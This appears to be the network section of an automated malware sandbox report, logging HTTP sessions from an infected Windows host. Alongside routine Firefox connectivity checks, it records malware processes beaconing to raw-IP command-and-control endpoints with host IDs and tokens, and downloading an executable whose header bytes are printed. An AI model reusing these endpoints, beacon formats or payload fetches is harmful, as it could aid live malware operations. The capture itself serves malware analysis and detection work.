Dec 14, 2024 23:59:21.765147924 CET	1236	IN	Data Raw: 7a 01 33 a1 e0 00 d6 0c 67 ab aa a6 ee 9c 36 10 ce 5f 36 0b 32 09 be 42 f0 8f 67 9f 2c dc 7b c1 bd 90 59 9d d6 88 9b c6 e1 0e 54 a8 62 81 7e 67 08 f5 51 e1 31 5e f4 6c e0 70 ef 71 a7 43 1c c6 91 ab 54 a9 2e f5 58 73 c8 48 b7 f5 ab 47 8d 1f ab 6a Data Ascii: z3g6_62Bg,{YTb~gQ1^lpqCT.XsHGjZ:~lwoHU>l3*{jppG-}RD%s`o^2>Z\>L+=FSuZX1KL$a8H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50009	34.107.221.82	80	4584	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:22.835062981 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 23:59:23.921027899 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sat, 14 Dec 2024 09:34:53 GMT Age: 48270 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 23:59:33.926513910 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 23:59:36.144701958 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 23:59:36.462539911 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sat, 14 Dec 2024 09:34:53 GMT Age: 48283 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 23:59:38.898221016 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 23:59:39.213083029 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sat, 14 Dec 2024 09:34:53 GMT Age: 48286 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 23:59:39.960431099 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 23:59:40.275048971 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sat, 14 Dec 2024 09:34:53 GMT Age: 48287 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 23:59:43.443917036 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 23:59:43.759165049 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sat, 14 Dec 2024 09:34:53 GMT Age: 48290 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 23:59:46.055210114 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 23:59:46.370661974 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sat, 14 Dec 2024 09:34:53 GMT Age: 48293 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 23:59:47.288604975 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 23:59:47.607253075 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sat, 14 Dec 2024 09:34:53 GMT Age: 48294 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 23:59:49.325158119 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 23:59:49.640239954 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sat, 14 Dec 2024 09:34:53 GMT Age: 48296 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 23:59:56.991920948 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 23:59:57.306796074 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sat, 14 Dec 2024 09:34:53 GMT Age: 48304 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 15, 2024 00:00:00.990571022 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 15, 2024 00:00:01.305475950 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sat, 14 Dec 2024 09:34:53 GMT Age: 48308 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 15, 2024 00:00:11.333287001 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 15, 2024 00:00:21.537899971 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 15, 2024 00:00:22.371984005 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 15, 2024 00:00:22.686980963 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sat, 14 Dec 2024 09:34:53 GMT Age: 48329 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 15, 2024 00:00:32.724350929 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 15, 2024 00:00:42.928064108 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 15, 2024 00:00:53.124420881 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 15, 2024 00:01:03.340939045 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 15, 2024 00:01:03.619148016 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 15, 2024 00:01:03.935595036 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sat, 14 Dec 2024 09:34:53 GMT Age: 48370 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 15, 2024 00:01:14.038028955 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 15, 2024 00:01:24.231208086 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 15, 2024 00:01:34.524379969 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 15, 2024 00:01:58.635138988 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 15, 2024 00:01:58.950700045 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sat, 14 Dec 2024 09:34:53 GMT Age: 48425 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 15, 2024 00:02:25.436172962 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 15, 2024 00:02:25.752461910 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sat, 14 Dec 2024 09:34:53 GMT Age: 48452 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 15, 2024 00:04:09.743124008 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 15, 2024 00:04:10.058341980 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sat, 14 Dec 2024 09:34:53 GMT Age: 48556 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 15, 2024 00:05:07.043812037 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 15, 2024 00:05:07.358910084 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sat, 14 Dec 2024 09:34:53 GMT Age: 48614 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 15, 2024 00:06:00.123588085 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 15, 2024 00:06:00.439209938 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sat, 14 Dec 2024 09:34:53 GMT Age: 48667 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50019	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:24.830935001 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 33 35 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015358001&unit=246122658369
Dec 14, 2024 23:59:26.176219940 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50027	185.215.113.206	80	3300	C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:26.980078936 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBKKKJJJKKEBGDAFID Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 2d 2d 0d 0a Data Ascii: ------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CFCBKKKJJJKKEBGDAFID--
Dec 14, 2024 23:59:28.824055910 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50031	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:27.925054073 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 23:59:29.256529093 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50041	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:30.894633055 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 23:59:32.250957012 CET	295	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 39 0d 0a 20 3c 63 3e 31 30 31 35 33 35 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 64 37 33 39 33 35 37 34 64 66 31 34 31 65 35 34 32 34 30 34 33 35 38 64 36 64 39 66 63 31 64 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 69 <c>1015359001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7393574df141e542404358d6d9fc1d#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50044	185.215.113.206	80	2356	C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:31.873799086 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 14, 2024 23:59:33.206746101 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 23:59:33.209427118 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHC Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 45 43 39 36 42 35 34 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 2d 2d 0d 0a Data Ascii: ------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="hwid"5DEC96B543762778904926------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="build"stok------AFCAAEGDBKJJKECBKFHC--
Dec 14, 2024 23:59:33.648732901 CET	210	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50049	31.41.244.11	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:32.433203936 CET	60	OUT	GET /files/flava/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 14, 2024 23:59:33.794630051 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:33 GMT Content-Type: application/octet-stream Content-Length: 1834496 Last-Modified: Sat, 14 Dec 2024 21:12:38 GMT Connection: keep-alive ETag: "675df4c6-1bfe00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 fe 59 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 cc 03 00 00 b0 00 00 00 00 00 00 00 80 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 48 00 00 04 00 00 e2 b0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELbYgH@H@T0h 1 H@.rsrc X@.idata 0Z@ )@\@ubvmxkob.z^@xdawalmhpH@.taggant0H"@
Dec 14, 2024 23:59:33.794675112 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:59:33.794711113 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:59:33.795085907 CET	672	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:59:33.795120001 CET	1236	IN	Data Raw: 57 89 78 bd 67 1e 96 0e b6 d0 78 09 37 d1 7a 8b 4d 4a 04 0c 1e d1 c7 ea 24 25 37 05 37 d5 7f c5 e5 84 37 49 80 91 cc 55 0b 67 fa 02 a0 31 02 7f d8 49 a8 dd ec 92 76 33 bc 5f 86 89 59 71 7d 0e 3f 85 9b 36 9c 3f 6f b9 24 6e 81 55 9c c8 e7 3f d4 79 Data Ascii: Wxgx7zMJ$%777IUg1Iv3_Yq}?6?o$nU?y'x=V:K)5uJhf?w{RG_$0IVi()~VA&T#(9}j??:XJ&Br1*wxvlwyL
Dec 14, 2024 23:59:33.795152903 CET	1236	IN	Data Raw: fd 13 01 ee c4 5e d7 04 f9 5f eb da 75 42 9a ae 15 8d 1f 9c cc 4d fe 85 aa 85 3d e2 10 d2 b0 16 6c 86 59 ab c4 c4 ef 1e 54 d6 ad 6a 86 e2 81 bb b8 8f 99 a3 15 4c d5 2a 29 d6 bf 85 07 d3 82 2e 9c 48 08 22 c0 28 50 c9 ce 75 1f 77 c4 d1 81 ba 9d 8c Data Ascii: ^_uBM=lYTjL).H"(PuwPQBv%rtCm0bYK9S8"^E?h=G+@!A$`z65o!jazw3wevEW=zUS
Dec 14, 2024 23:59:33.795782089 CET	448	IN	Data Raw: 81 91 0c fa 95 9a 4c c4 a1 70 7a 1e 9a 76 bc 1d f6 9a 3d 47 b3 25 04 3f 61 28 98 59 80 3b a7 cc bd 25 89 7c b6 15 8f 59 fd ef ab 4c ca 89 72 99 df 2d fa bf 94 4b 8f eb 59 de ba 44 f1 27 67 01 de f2 72 a1 f3 ba cc 2b fa d6 c8 f9 ed 0a 9a 9b 70 d1 Data Ascii: Lpzv=G%?a(Y;%\|YLr-KYD'gr+p(E;4~J{E~)s}FW%"d!'18\yvw_L?gaXt`yhl`u1)I^85;xFGZ$F~:L"QZB2D@
Dec 14, 2024 23:59:33.795814037 CET	1236	IN	Data Raw: 7d 6b 7f 93 7a 87 f5 0e 3d 0a a1 d3 84 4a 93 eb 26 b9 52 69 d5 1d f5 0c 9f eb 81 31 9e e6 f9 c2 93 e1 04 3c f7 13 4f bb c6 21 c8 07 97 b7 78 a8 a7 61 88 7c 8d 28 fc 12 b0 0b f7 05 2b 29 ff 18 9f 84 b1 58 10 c4 1c 0d c1 e3 17 0a c0 05 13 12 bd f2 Data Ascii: }kz=J&Ri1<O!xa\|(+)X_/``zAmRAgxHIs6YuN(BHKe\|P&HI_z9f/UYKAjV=cAd"3E!?LJ&uu5sT'B
